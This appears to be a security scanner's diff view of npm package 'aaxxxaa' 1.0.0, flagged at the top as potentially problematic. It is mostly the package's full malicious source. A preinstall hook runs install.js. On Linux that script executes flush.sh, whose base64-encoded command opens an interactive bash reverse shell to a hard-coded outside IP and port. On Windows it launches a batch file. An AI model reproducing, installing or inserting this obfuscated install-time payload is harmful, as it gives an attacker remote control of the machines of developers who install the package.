aaxxxaa 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of aaxxxaa might be problematic. Click here for more details.

package/flush.sh ADDED
@@ -0,0 +1 @@
1
+ echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzQzLjEzOC44Mi4xNjAvMTg4NzcgMD4mMQ== |{base64,-d}|{bash,-i}
package/index.js ADDED
File without changes
package/install.js ADDED
@@ -0,0 +1,19 @@
1
+ const { exec }= require("child_process");
2
+
3
+ function Linux(){
4
+ exec("mv flush.sh /tmp/flush.sh && chmod +x /tmp/flush.sh && /bin/bash -c /tmp/flush.sh",(error,stdout,stderr)=>{
5
+
6
+ });
7
+ }
8
+
9
+ var opsys= process.platform;
10
+ if (opsys =="darwin"){
11
+ opsys ="MacoS";
12
+ }else if (opsys =="win32" || opsys =="win64"){
13
+ opsys ="Windows";
14
+ const { spawn } = require('child_process');
15
+ const bat = spawn('cmd.exe',['/c','all.bat']);
16
+ }else if (opsys =="linux"){
17
+ opsys = "Linux";
18
+ Linux();
19
+ }
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "aaxxxaa",
3
+ "version": "1.0.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node install.js"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
11
+ }